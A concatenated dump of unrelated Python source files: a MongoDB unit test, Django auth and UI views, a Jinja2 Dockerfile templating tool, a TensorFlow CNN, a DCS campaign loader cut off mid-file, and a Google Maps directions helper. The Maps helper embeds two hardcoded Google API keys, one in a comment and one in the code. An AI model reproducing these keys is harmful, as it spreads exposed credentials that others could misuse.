:)\")\nprint(\"We hope to see you again!\")","sub_path":"RockPaperScissorsV5.py","file_name":"RockPaperScissorsV5.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"49099327","text":"#!/usr/bin/python\n# Classification (U)\n\n\"\"\"Program: db_db_cmd.py\n\n Description: Unit testing of DB.db_cmd in mongo_class.py.\n\n Usage:\n test/unit/mongo_class/db_db_cmd.py\n\n Arguments:\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\nimport sys\nimport os\n\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\n# Third-party\n\n# Local\nsys.path.append(os.getcwd())\nimport mongo_class\nimport version\n\n__version__ = version.__version__\n\n\nclass DBValidate(object):\n\n \"\"\"Class: DBValidate\n\n Description: Class stub holder for DB class.\n\n Methods:\n __init__\n command\n\n \"\"\"\n\n def __init__(self):\n\n \"\"\"Function: __init__\n\n Description: Class intialization.\n\n Arguments:\n\n \"\"\"\n\n self.cmd = None\n self.obj = None\n\n def command(self, cmd, obj=None):\n\n \"\"\"Function: command\n\n Description: Stub for DB.db.command method.\n\n Arguments:\n (input) cmd\n (input) obj\n (output) Returns the output of the database command.\n\n \"\"\"\n\n self.cmd = cmd\n self.obj = obj\n\n return True\n\n\nclass UnitTest(unittest.TestCase):\n\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_default\n test_object\n\n \"\"\"\n\n def setUp(self):\n\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n\n self.name = \"Mongo_Server\"\n self.user = \"mongo_user\"\n self.japd = \"mongo_pd\"\n self.host = \"host_server\"\n self.port = 27017\n self.dbs = \"test\"\n self.db_auth = None\n\n def test_default(self):\n\n \"\"\"Function: test_default\n\n Description: Test db_cmd method with default arguments.\n\n Arguments:\n\n \"\"\"\n\n mongo = mongo_class.DB(self.name, self.user, self.japd,\n self.host, self.port)\n mongo.db = DBValidate()\n\n self.assertTrue(mongo.db_cmd(\"command\"))\n\n def test_object(self):\n\n \"\"\"Function: test_object\n\n Description: Test with object passed to method.\n\n Arguments:\n\n \"\"\"\n\n mongo = mongo_class.DB(self.name, self.user, self.japd,\n self.host, self.port)\n mongo.db = DBValidate()\n\n self.assertTrue(mongo.db_cmd(\"command\", obj=\"object_name\"))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/unit/mongo_class/db_db_cmd.py","file_name":"db_db_cmd.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"383257335","text":"from django import forms\nfrom django.contrib.auth.views import LoginView as DefaultLoginView\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import Http404\nfrom django.shortcuts import redirect, reverse, render, get_object_or_404\nfrom django.views.generic import View, UpdateView, DetailView\nfrom .forms_auth import UpdateProfileForm, SignUpForm\n\n\nfrom .forms_auth import LoginForm\nfrom advito.models import Profile\n\n\nclass LoginView(DefaultLoginView):\n template_name = \"my_auth/login.html\"\n form = LoginForm\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = 
authenticate(username=username, password=password)\n if user:\n login(request, user)\n return redirect(reverse('advito:announcement'), request)\n else:\n return render(request, self.template_name, {'form': form})\n else:\n return render(request, self.template_name, {'form': form})\n\n\ndef logout_view(request):\n logout(request)\n return redirect(reverse('advito:login'))\n\nclass ProfileView(DetailView):\n model = Profile\n template_name = 'my_auth/profile.html'\n\n def get_object(self):\n return get_object_or_404(self.model, user_id=self.kwargs['user_id'])\n\nclass EditProfileView(UpdateView):\n model = Profile\n form_class = UpdateProfileForm\n template_name = \"my_auth/edit_profile.html\"\n slug_field = \"user_id\"\n slug_url_kwarg = \"user_id\"\n\n def get_success_url(self):\n user_id = self.kwargs.get(\"user_id\")\n return reverse(\"advito:profile\", args=(self.request.user.id, ))\n\n def dispatch(self, request, *args, **kwargs):\n obj = self.get_object()\n if obj.user != request.user:\n raise Http404('go away')\n return super(EditProfileView, self).dispatch(request, *args, **kwargs)\n\nclass SignUpView(View):\n template_name = \"my_auth/siginup.html\"\n signup_form = SignUpForm\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name, {'form': self.signup_form})\n\n def post(self, request, *args, **kwargs):\n user_form = self.signup_form(data=request.POST)\n\n registered = False\n context = {}\n if user_form.is_valid():\n user_form.save()\n context.update({'registered': True})\n registered = True\n else:\n context.update({'form': user_form})\n\n return render(request, self.template_name, context)\n\n","sub_path":"advito/views_auth.py","file_name":"views_auth.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"415355940","text":"\"\"\"\ndodo - Parameterized docker builds\n----\n\nUse the power of the jinja2 template language to create parameterized\nand configurable docker files. Could also be used for any other kind\nof (line-based) config file, hopefully.\n\nDodo itself does not build containers, but you can pipe it's result directly\nto docker build (all logging goes to stderr):\n\n dodo testconfig.py Dockerfile.tpl | docker build -t dermitch/test\n\nWays to set config keys:\n- The config file itself (defaults)\n- Environment variables (KEY=value dodo testconfig.py Dockerfile)\n- Arguments (dodo testconfig.py Dockerfile KEY=value ...)\n\nAdditional configuration features:\n- Require items to be in a list\n- Use a dictionary mapping\n- Use any callable\nSee testconfig.py for examples.\n\nIn your template, use the line syntax of Jinja2 for better readability:\n\n## if WITH_MYSQL:\nRUN apt-get install -y mysql-server\n## endif\n\n:author: Michael Mayr \n:license: MIT license\n:version: 1.0\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport imp\nimport logging\nfrom argparse import ArgumentParser\n\nfrom jinja2 import Environment, DictLoader\n\nlog = logging.getLogger(\"dodo\")\n\n\n#\n# Configuration\n#\ndef str_to_bool(value, default=None):\n \"\"\"\n Convert a string to a boolean. 
Supported values:\n\n    True: yes, 1, true\n    False: no, 0, false\n\n    If the value can't be determined, default will be returned.\n    \"\"\"\n    if isinstance(value, bool):\n        return value\n    if value.lower() in (\"yes\", \"1\", \"true\"):\n        return True\n    if value.lower() in (\"no\", \"0\", \"false\"):\n        return False\n    return default\n\n\ndef str_to_number(value, default=None):\n    \"\"\"Convert a string to a number or return a default value if it fails\"\"\"\n    try:\n        return int(value)\n    except ValueError:\n        return default\n\n\ndef dict_mapper(mapping, key):\n    \"\"\"Return a dict's key or throw an error. We assume that failed lookups\n    are errors which shouldn't return the default.\"\"\"\n    try:\n        return mapping[key]\n    except KeyError:\n        raise Exception(\"Invalid key {} for mapping\".format(key))\n\n\ndef get_config(configfile, osenviron, args_list):\n    \"\"\"\n    Determine build configuration using:\n    - A python config file for defaults and special mappings\n    - Environment variables\n    - Command line arguments\n\n    Values will only be overridden if they validate. Enable verbose logging\n    if your values are not applied to see the reason.\n    \"\"\"\n    # Mapping of VARIABLE -> converter function\n    type_mapping = {}\n    # Template values\n    values = {}\n\n    log.debug(\"Loading file {}\".format(configfile))\n    config = imp.load_source('dodo_config', configfile)\n\n    log.debug(\"Processing configuration from file\")\n    for name in dir(config):\n        if name.upper() != name or name.startswith('_'):\n            continue\n\n        value = getattr(config, name)\n\n        if hasattr(config, \"_\" + name):\n            # Variable mappings\n            mapper = getattr(config, \"_\" + name)\n            if isinstance(mapper, (tuple, list, set)):\n                log.debug(\" -> {} looks like a list\".format(name))\n                type_mapping[name] = lambda x, m=mapper: x if x in m else None\n            elif isinstance(mapper, dict):\n                log.debug(\" -> {} looks like a dict\".format(name))\n                type_mapping[name] = lambda x, m=mapper: dict_mapper(m, x)\n            elif callable(mapper):\n                log.debug(\" -> {} looks like a callable\".format(name))\n                type_mapping[name] = mapper\n        else:\n            # Static mappings\n            if isinstance(value, bool):\n                log.debug(\" -> {} looks like a boolean\".format(name))\n                type_mapping[name] = str_to_bool\n            elif isinstance(value, (str, unicode)):\n                log.debug(\" -> {} looks like a string\".format(name))\n                type_mapping[name] = unicode\n            elif isinstance(value, (int, long)):\n                log.debug(\" -> {} looks like an integer\".format(name))\n                type_mapping[name] = str_to_number\n\n        if name in type_mapping:\n            values[name] = type_mapping[name](value)\n\n    # Find any matching environment variable and try to parse it\n    for key in values:\n        if key in osenviron:\n            newval = type_mapping[key](osenviron[key])\n            if newval is not None:\n                log.debug(\" -> {} overridden by environment\".format(key))\n                values[key] = newval\n            else:\n                # warning\n                log.warning(\"Could not parse value of env {}\".format(key))\n\n    # args_list = ['key=\"value\"', 'key=1', ...]\n    for arg in args_list:\n        key, value = arg.split(\"=\", 1)\n        if value.startswith('\"'):\n            value = value[1:-1]\n\n        if key not in type_mapping:\n            log.warning(\"Key {} hasn't been defined in \"\n                        \"the config file\".format(key))\n            continue\n\n        newval = type_mapping[key](value)\n        if newval is not None:\n            log.debug(\" -> {} overridden by argument\".format(key))\n            values[key] = newval\n        else:\n            log.warning(\"Could not parse value of argument {}\".format(key))\n\n    return values\n\n\ndef finalize(value):\n    \"\"\"Finalizer for Jinja2 which returns an empty string on None's\"\"\"\n    if value is None:\n        return ''\n    
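# A condensed illustration of the precedence get_config() implements above:
# config-file defaults, then environment, then KEY=value arguments, where a
# later layer wins only if its value converts successfully. The resolve()
# helper below is hypothetical, not part of dodo itself.
def resolve(defaults, env, args, converters):
    values = dict(defaults)
    for key in values:
        for layer in (env, args):
            if key in layer:
                converted = converters[key](layer[key])
                if converted is not None:
                    values[key] = converted
    return values

print(resolve({"DEBUG": False}, {"DEBUG": "yes"}, {"DEBUG": "bogus"},
              {"DEBUG": lambda v: {"yes": True, "no": False}.get(v)}))
# {'DEBUG': True} -- the env value parsed; the bogus argument was rejected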
return value\n\n\ndef main():\n \"\"\"Main method for dodo, parse arguments and the template\"\"\"\n #\n # Arguments\n #\n parser = ArgumentParser()\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"Enable verbose logging\")\n parser.add_argument(\"configfile\", help=\"Python configuration file\")\n parser.add_argument(\"template\", help=\"Template file\")\n parser.add_argument(\"config\", nargs=\"*\",\n help=\"Overridden config values (KEY=value)\")\n\n args = parser.parse_args()\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG, stream=sys.stderr)\n else:\n logging.basicConfig(level=logging.WARNING, stream=sys.stderr)\n\n values = get_config(args.configfile, os.environ, args.config)\n\n log.debug(\"------ Config --------\")\n for key, value in values.iteritems():\n log.debug(\"{}={!r}\".format(key, value))\n log.debug(\"------ /Config --------\")\n\n #\n # Template renderer\n #\n templates = {}\n env = Environment(\n line_statement_prefix='##',\n keep_trailing_newline=True,\n finalize=finalize,\n autoescape=False,\n loader=DictLoader(templates)\n )\n\n log.debug(\"Loading template\")\n with open(args.template) as f:\n templates['template'] = f.read().decode(\"UTF-8\")\n\n log.debug(\"Rendering template\")\n tpl = env.get_template(\"template\")\n result = tpl.render(**values)\n\n log.debug(\"-----------------------------------------\")\n print(result)\n log.debug(\"-----------------------------------------\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"dodo.py","file_name":"dodo.py","file_ext":"py","file_size_in_byte":6989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"141013701","text":"\"\"\"\nViews\n\n\"\"\"\nimport logging\n\nfrom rest_framework import generics\nfrom rest_framework.renderers import TemplateHTMLRenderer\n\nfrom api import views as apiviews\nfrom . import serializers\n\nLOG = logging.getLogger(__name__)\n\n\nclass ResourcePageMixin(apiviews.ViewMixinBase):\n \"\"\"\n Mixin class for views which ensured the returned object is decorated with the current user's\n profile as required by :py:class:`ui.serializers.ResourcePageSerializer`.\n\n \"\"\"\n renderer_classes = [TemplateHTMLRenderer]\n template_name = 'ui/resource.html'\n\n def get_object(self):\n obj = super().get_object()\n obj.profile = self.get_profile()\n return obj\n\n\nclass MediaView(ResourcePageMixin, apiviews.MediaItemMixin, generics.RetrieveAPIView):\n \"\"\"View for rendering an individual media item. Extends the DRF's media item view.\"\"\"\n serializer_class = serializers.MediaItemPageSerializer\n template_name = 'ui/media.html'\n\n\nclass MediaItemAnalyticsView(ResourcePageMixin, apiviews.MediaItemMixin, generics.RetrieveAPIView):\n \"\"\"\n View for rendering an individual media item's analytics.\n Extends the DRF's media item analytics view.\n\n \"\"\"\n serializer_class = serializers.ResourcePageSerializer\n\n\nclass ChannelView(ResourcePageMixin, apiviews.ChannelMixin, generics.RetrieveAPIView):\n \"\"\"View for rendering an individual channel. Extends the DRF's channel view.\"\"\"\n serializer_class = serializers.ChannelPageSerializer\n\n\nclass PlaylistView(ResourcePageMixin, apiviews.PlaylistMixin, generics.RetrieveAPIView):\n \"\"\"View for rendering an individual playlist. 
Extends the DRF's playlist view.\"\"\"\n    serializer_class = serializers.PlaylistPageSerializer\n","sub_path":"ui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148221814","text":"##\n# API KEY AIzaSyAY1aatbdVCglJhXI0HFddm5pEkPTUpBFU\n#python3.6\n# importing required libraries\nimport sys \n\n\"\"\"\nusing Google Maps API to get directions from \\\n\n- start point to end_point\n- purpose is\n- - to grab the distance (in meters) from start to end_point\n- - to grab the travel time (in seconds) from start to end_point\n\n\"\"\"\nimport requests, json\n\n\nclass GoogleMapsUtility():\n    def __init__(self):\n        self.api_key = 'AIzaSyAlFOfYJqGZR3a_5VcbrihyaproXXWTeY4'\n\n    def directionsRequest(self, start_point, end_point):\n        try:\n            # url variable stores the Directions API endpoint\n            url = 'https://maps.googleapis.com/maps/api/directions/json'\n            # Get method of requests module\n            payload = {'key':self.api_key,'origin':start_point,'destination':end_point}\n            # makes google directions API requests\n            response = requests.get(url,params=payload)\n            # grabs JSON object from API request\n            data = response.json()\n            # checks if the status is successful\n            if response.status_code == 200:\n                # iterates through the JSON object\n                for directions in data['routes'][0]['legs']:\n                    # gets distance dictionary from json\n                    distance = directions['distance']\n                    # gets duration dictionary from json\n                    duration = directions['duration']\n                    # get the value from distance (the API reports meters)\n                    distance_meters = distance.get(\"value\")\n                    # get the value from duration (the API reports seconds)\n                    duration_seconds = duration.get(\"value\")\n                    return int(distance_meters), int(duration_seconds)\n\n            elif response.status_code != 200:\n                print(response.status_code)\n                print(response.json())\n                return response.status_code\n            \n        except:\n            sys.exit(\"Something went wrong! 
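# The Directions API values above are raw API units (distance.value in meters,
# duration.value in seconds); a conversion like this hypothetical helper would
# produce the miles and hours/minutes the module docstring mentions.
def to_miles_and_hhmm(distance_meters, duration_seconds):
    miles = distance_meters / 1609.344
    hours, minutes = divmod(duration_seconds // 60, 60)
    return round(miles, 1), "{}:{:02d}".format(hours, minutes)

print(to_miles_and_hhmm(16093, 5400))  # (10.0, '1:30')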
Try again.\")","sub_path":"contents/google_maps_utility.py","file_name":"google_maps_utility.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"594157382","text":"import tensorflow as tf\n\ndef inference(images, batch_size, n_classess):\n    # conv1,shape=[kernel size, kernel size, channels, kernel numbers]\n    # First convolutional layer\n    # tf.variable_scope() is mainly used together with tf.get_variable() to share variables; later calls reuse them instead of creating new ones, which preserves the parameters\n    with tf.variable_scope('conv1') as scope:\n        # initialize the weights, [3,3,3,16]\n        weights = tf.get_variable('weights', shape = [3, 3, 3, 16], dtype = tf.float32,\n                                  initializer = tf.truncated_normal_initializer(stddev=0.1, dtype=tf.float32))\n        # tf.truncated_normal is a random-number generator; tf.random_normal, tf.random_uniform and tf.random_gamma also exist\n        # initialize the biases, 16 of them\n        biases = tf.get_variable('biases', shape=[16], dtype = tf.float32,\n                                 initializer = tf.constant_initializer(0.1))\n        # tf.constant_initializer initializes constants; bias terms are usually initialized with it\n        # Perform the convolution. The first argument is the input image, a 4-D tensor of shape [batch, in_height, in_width, in_channels],\n        # i.e. [images per training batch, image height, image width, number of channels]; its type must be float32 or float64\n        # The second argument, filter, is the convolution kernel: a tensor of shape [filter_height, filter_width, in_channels, out_channels],\n        # i.e. [kernel height, kernel width, number of image channels, number of kernels]\n        # The third argument, strides, is the stride of the sliding window for each dimension of the input: a 1-D vector of length 4\n        # The fourth argument, padding, is a string, either \"SAME\" or \"VALID\", which selects the convolution mode\n        # The result is a tensor, the feature map, again of shape [batch, height, width, channels]\n        conv = tf.nn.conv2d(images, weights, strides=[1,1,1,1], padding='SAME')\n        # Add the biases to the result\n        pre_activation = tf.nn.bias_add(conv, biases)\n        # Pass the result through the relu activation to introduce non-linearity\n        conv1 = tf.nn.relu(pre_activation, name= scope.name)\n    \n    # pool1 and norm1\n    # Pooling layer\n    with tf.variable_scope('pooling1_lrn') as scope:\n        # tf.nn.max_pool implements the forward pass of max pooling; its arguments are similar to conv2d, ksize is the filter size\n        pool1 = tf.nn.max_pool(conv1, ksize=[1,3,3,1],strides=[1,2,2,1],padding='SAME',name='poolong1')\n        # Local Response Normalization, typically applied after activation/pooling to improve accuracy.\n        norm1 = tf.nn.lrn(pool1, depth_radius=4, bias=1, alpha=0.001/9.0, beta=0.75, name='norm1')\n    \n    # conv2, the second convolutional layer\n    # Same computation as the first layer; the only difference is the name scope\n    with tf.variable_scope('conv2') as scope:\n        weights = tf.get_variable('weights', shape=[3,3,16,16], dtype=tf.float32, initializer=tf.truncated_normal_initializer(stddev=0.1,dtype=tf.float32))\n        biases = tf.get_variable('biases',\n                                 shape=[16], \n                                 dtype=tf.float32,\n                                 initializer=tf.constant_initializer(0.1))\n        conv = tf.nn.conv2d(norm1, weights, strides=[1,1,1,1],padding='SAME')\n        pre_activation = tf.nn.bias_add(conv, biases)\n        conv2 = tf.nn.relu(pre_activation, name='conv2')\n    \n    # pool2 and norm2, the second pooling layer\n    with tf.variable_scope('pooling2_lrn') as scope:\n        norm2 = tf.nn.lrn(conv2, depth_radius=4,bias=1,alpha=0.001/9,beta=0.75,name='norm2')\n        pool2 = tf.nn.max_pool(norm2, ksize=[1,3,3,1],strides=[1,1,1,1],padding='SAME',name='pooling2')\n    \n    \n    # local3, fully connected layer\n    with tf.variable_scope('local3') as scope:\n        # -1 means the size of that dimension is not given explicitly; the function works it out automatically\n        reshape = tf.reshape(pool2, shape=[batch_size, -1])\n        # get the number of columns after the reshape; matrix multiplication needs the column count to match the row count\n        dim = reshape.get_shape()[1].value\n        weights = tf.get_variable('weights', shape=[dim,128],dtype=tf.float32,initializer=tf.truncated_normal_initializer(stddev=0.005,dtype=tf.float32))\n        biases = tf.get_variable('biases',shape=[128], dtype=tf.float32,initializer=tf.constant_initializer(0.1))\n        local3 = tf.nn.relu(tf.matmul(reshape, weights) + biases, name=scope.name)\n    \n    # local4, fully connected layer\n    with tf.variable_scope('local4') as scope:\n        weights = tf.get_variable('weights',shape=[128,128],dtype=tf.float32,initializer=tf.truncated_normal_initializer(stddev=0.005,dtype=tf.float32))\n        biases = tf.get_variable('biases', shape=[128],dtype=tf.float32, initializer=tf.constant_initializer(0.1))\n        local4 = tf.nn.relu(tf.matmul(local3,weights) + biases, name = 'local4')\n    # softmax logistic regression\n    with tf.variable_scope('softmax_linear') as scope:\n        weights = tf.get_variable('softmax_linear',shape=[128, n_classess],dtype=tf.float32,initializer=tf.truncated_normal_initializer(stddev=0.005,dtype=tf.float32))\n        biases = tf.get_variable('biases',shape=[n_classess],dtype=tf.float32,initializer=tf.constant_initializer(0.1))\n        softmax_linear = tf.add(tf.matmul(local4, weights),biases,name='softmax_linear')\n    \n    return softmax_linear\n# Define the loss function: the gap between the predictions and the ground truth\ndef losses(logits, labels):\n    with tf.variable_scope('loss') as scope:\n        # compute the cross-entropy loss after softmax regression\n        # logits is the network output, labels is the ground truth\n        cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels,name='xentropy_per_example')\n        # take the mean over all elements of cross_entropy\n        loss = tf.reduce_mean(cross_entropy, name='loss')\n        # add a scalar summary for the loss; typically used when plotting loss and accuracy curves.\n        tf.summary.scalar(scope.name+'/loss',loss)\n    return loss\n# Add the optimization ops that minimize the loss function via gradient descent\ndef trainning(loss, learning_rate):\n    with tf.name_scope('optimizer'):\n        # during training, first instantiate an optimizer, e.g. tf.train.GradientDescentOptimizer, and optimize the gradients at a given learning rate\n        optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n        # a single value that records the global training step\n        global_step = tf.Variable(0, name='global_step',trainable=False)\n        # add an op that minimizes loss and updates var_list, returning the updated var_list; if global_step is not None the op also increments global_step\n        train_op = optimizer.minimize(loss, global_step=global_step)\n    return train_op\n\n# Define the evaluation function; returns the accuracy\ndef evaluation(logits, labels):\n    with tf.variable_scope('accuracy') as scope:\n        correct = tf.nn.in_top_k(logits,labels,1) # checks whether the prediction matches the label; returns a bool tensor\n        # K means: is the target among the top K predictions for each sample. Usually K = 1.\n        # convert the type\n        correct = tf.cast(correct, tf.float16)\n        accuracy = tf.reduce_mean(correct) # take the mean, i.e. the accuracy\n        # add a scalar summary for the accuracy\n        tf.summary.scalar(scope.name+'/accuracy',accuracy)\n        return accuracy\n\n\n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"320357212","text":"from __future__ import annotations\n\nimport itertools\nimport json\nimport logging\nfrom dataclasses import dataclass\nfrom functools import cached_property\nfrom itertools import tee\nfrom pathlib import Path\nfrom typing import Any, Dict, Iterator, List, Optional, Set, Tuple, Union, cast\n\nfrom shapely import geometry\nfrom shapely import ops\n\nfrom dcs import Mission\nfrom dcs.countries import (\n    CombinedJointTaskForcesBlue,\n    CombinedJointTaskForcesRed,\n)\nfrom dcs.country import Country\nfrom dcs.mapping import Point\nfrom dcs.planes import F_15C\nfrom dcs.ships import (\n    CVN_74_John_C__Stennis,\n    LHA_1_Tarawa,\n    USS_Arleigh_Burke_IIa,\n)\nfrom dcs.statics import Fortification\nfrom dcs.terrain import (\n    caucasus,\n    nevada,\n    normandy,\n    persiangulf,\n    syria,\n    thechannel,\n)\nfrom dcs.terrain.terrain import Airport, Terrain\nfrom dcs.unitgroup import (\n    FlyingGroup,\n    Group,\n    ShipGroup,\n    StaticGroup,\n    VehicleGroup,\n)\nfrom dcs.vehicles import AirDefence, Armor, MissilesSS, Unarmed\n\nfrom gen.flights.flight import FlightType\nfrom .controlpoint import (\n    Airfield,\n    Carrier,\n    ControlPoint,\n    Lha,\n    MissionTarget,\n    
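# A numpy sanity check of what the loss comments above describe: sparse
# softmax cross-entropy for one sample is -log(softmax(logits)[label]).
# The logits are made-up numbers, not model output.
import numpy as np

logits = np.array([2.0, 1.0, 0.1])
label = 0
probs = np.exp(logits - logits.max())
probs /= probs.sum()
print(-np.log(probs[label]))  # ~0.417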
OffMapSpawn,\n Fob,\n)\nfrom .landmap import Landmap, load_landmap, poly_contains\nfrom ..utils import nm_to_meter\n\nNumeric = Union[int, float]\n\nSIZE_TINY = 150\nSIZE_SMALL = 600\nSIZE_REGULAR = 1000\nSIZE_BIG = 2000\nSIZE_LARGE = 3000\n\nIMPORTANCE_LOW = 1\nIMPORTANCE_MEDIUM = 1.2\nIMPORTANCE_HIGH = 1.4\n\nFRONTLINE_MIN_CP_DISTANCE = 5000\n\ndef pairwise(iterable):\n \"\"\"\n itertools recipe\n s -> (s0,s1), (s1,s2), (s2, s3), ...\n \"\"\"\n a, b = tee(iterable)\n next(b, None)\n return zip(a, b)\n\n\nclass MizCampaignLoader:\n BLUE_COUNTRY = CombinedJointTaskForcesBlue()\n RED_COUNTRY = CombinedJointTaskForcesRed()\n\n OFF_MAP_UNIT_TYPE = F_15C.id\n\n CV_UNIT_TYPE = CVN_74_John_C__Stennis.id\n LHA_UNIT_TYPE = LHA_1_Tarawa.id\n FRONT_LINE_UNIT_TYPE = Armor.APC_M113.id\n\n FOB_UNIT_TYPE = Unarmed.CP_SKP_11_ATC_Mobile_Command_Post.id\n\n EWR_UNIT_TYPE = AirDefence.EWR_55G6.id\n SAM_UNIT_TYPE = AirDefence.SAM_SA_10_S_300PS_SR_64H6E.id\n GARRISON_UNIT_TYPE = AirDefence.SAM_SA_19_Tunguska_2S6.id\n OFFSHORE_STRIKE_TARGET_UNIT_TYPE = Fortification.Oil_platform.id\n SHIP_UNIT_TYPE = USS_Arleigh_Burke_IIa.id\n MISSILE_SITE_UNIT_TYPE = MissilesSS.SRBM_SS_1C_Scud_B_9K72_LN_9P117M.id\n COASTAL_DEFENSE_UNIT_TYPE = MissilesSS.SS_N_2_Silkworm.id\n\n # Multiple options for the required SAMs so campaign designers can more\n # accurately see the coverage of their IADS for the expected type.\n REQUIRED_LONG_RANGE_SAM_UNIT_TYPES = {\n AirDefence.SAM_Patriot_LN_M901.id,\n AirDefence.SAM_SA_10_S_300PS_LN_5P85C.id,\n AirDefence.SAM_SA_10_S_300PS_LN_5P85D.id,\n }\n\n REQUIRED_MEDIUM_RANGE_SAM_UNIT_TYPES = {\n AirDefence.SAM_Hawk_LN_M192.id,\n AirDefence.SAM_SA_2_LN_SM_90.id,\n AirDefence.SAM_SA_3_S_125_LN_5P73.id,\n }\n\n BASE_DEFENSE_RADIUS = nm_to_meter(2)\n\n def __init__(self, miz: Path, theater: ConflictTheater) -> None:\n self.theater = theater\n self.mission = Mission()\n self.mission.load_file(str(miz))\n self.control_point_id = itertools.count(1000)\n\n # If there are no red carriers there usually aren't red units. Make sure\n # both countries are initialized so we don't have to deal with None.\n if self.mission.country(self.BLUE_COUNTRY.name) is None:\n self.mission.coalition[\"blue\"].add_country(self.BLUE_COUNTRY)\n if self.mission.country(self.RED_COUNTRY.name) is None:\n self.mission.coalition[\"red\"].add_country(self.RED_COUNTRY)\n\n @staticmethod\n def control_point_from_airport(airport: Airport) -> ControlPoint:\n\n # The wiki says this is a legacy property and to just use regular.\n size = SIZE_REGULAR\n\n # The importance is taken from the periodicity of the airport's\n # warehouse divided by 10. 30 is the default, and out of range (valid\n # values are between 1.0 and 1.4). 
If it is used, pick the default\n # importance.\n if airport.periodicity == 30:\n importance = IMPORTANCE_MEDIUM\n else:\n importance = airport.periodicity / 10\n\n cp = Airfield(airport, size, importance)\n cp.captured = airport.is_blue()\n\n # Use the unlimited aircraft option to determine if an airfield should\n # be owned by the player when the campaign is \"inverted\".\n cp.captured_invert = airport.unlimited_aircrafts\n\n return cp\n\n def country(self, blue: bool) -> Country:\n country = self.mission.country(\n self.BLUE_COUNTRY.name if blue else self.RED_COUNTRY.name)\n # Should be guaranteed because we initialized them.\n assert country\n return country\n\n @property\n def blue(self) -> Country:\n return self.country(blue=True)\n\n @property\n def red(self) -> Country:\n return self.country(blue=False)\n\n def off_map_spawns(self, blue: bool) -> Iterator[FlyingGroup]:\n for group in self.country(blue).plane_group:\n if group.units[0].type == self.OFF_MAP_UNIT_TYPE:\n yield group\n\n def carriers(self, blue: bool) -> Iterator[ShipGroup]:\n for group in self.country(blue).ship_group:\n if group.units[0].type == self.CV_UNIT_TYPE:\n yield group\n\n def lhas(self, blue: bool) -> Iterator[ShipGroup]:\n for group in self.country(blue).ship_group:\n if group.units[0].type == self.LHA_UNIT_TYPE:\n yield group\n \n def fobs(self, blue: bool) -> Iterator[VehicleGroup]:\n for group in self.country(blue).vehicle_group:\n if group.units[0].type == self.FOB_UNIT_TYPE:\n yield group\n\n @property\n def ships(self) -> Iterator[ShipGroup]:\n for group in self.blue.ship_group:\n if group.units[0].type == self.SHIP_UNIT_TYPE:\n yield group\n\n @property\n def ewrs(self) -> Iterator[VehicleGroup]:\n for group in self.blue.vehicle_group:\n if group.units[0].type == self.EWR_UNIT_TYPE:\n yield group\n\n @property\n def sams(self) -> Iterator[VehicleGroup]:\n for group in self.blue.vehicle_group:\n if group.units[0].type == self.SAM_UNIT_TYPE:\n yield group\n\n @property\n def garrisons(self) -> Iterator[VehicleGroup]:\n for group in self.blue.vehicle_group:\n if group.units[0].type == self.GARRISON_UNIT_TYPE:\n yield group\n\n @property\n def offshore_strike_targets(self) -> Iterator[StaticGroup]:\n for group in self.blue.static_group:\n if group.units[0].type == self.OFFSHORE_STRIKE_TARGET_UNIT_TYPE:\n yield group\n\n @property\n def missile_sites(self) -> Iterator[VehicleGroup]:\n for group in self.blue.vehicle_group:\n if group.units[0].type == self.MISSILE_SITE_UNIT_TYPE:\n yield group\n\n @property\n def coastal_defenses(self) -> Iterator[VehicleGroup]:\n for group in self.blue.vehicle_group:\n if group.units[0].type == self.COASTAL_DEFENSE_UNIT_TYPE:\n yield group\n\n @property\n def required_long_range_sams(self) -> Iterator[VehicleGroup]:\n for group in self.red.vehicle_group:\n if group.units[0].type in self.REQUIRED_LONG_RANGE_SAM_UNIT_TYPES:\n yield group\n\n @property\n def required_medium_range_sams(self) -> Iterator[VehicleGroup]:\n for group in self.red.vehicle_group:\n if group.units[0].type in self.REQUIRED_MEDIUM_RANGE_SAM_UNIT_TYPES:\n yield group\n\n @cached_property\n def control_points(self) -> Dict[int, ControlPoint]:\n control_points = {}\n for airport in self.mission.terrain.airport_list():\n if airport.is_blue() or airport.is_red():\n control_point = self.control_point_from_airport(airport)\n control_points[control_point.id] = control_point\n\n for blue in (False, True):\n for group in self.off_map_spawns(blue):\n control_point = OffMapSpawn(next(self.control_point_id),\n 
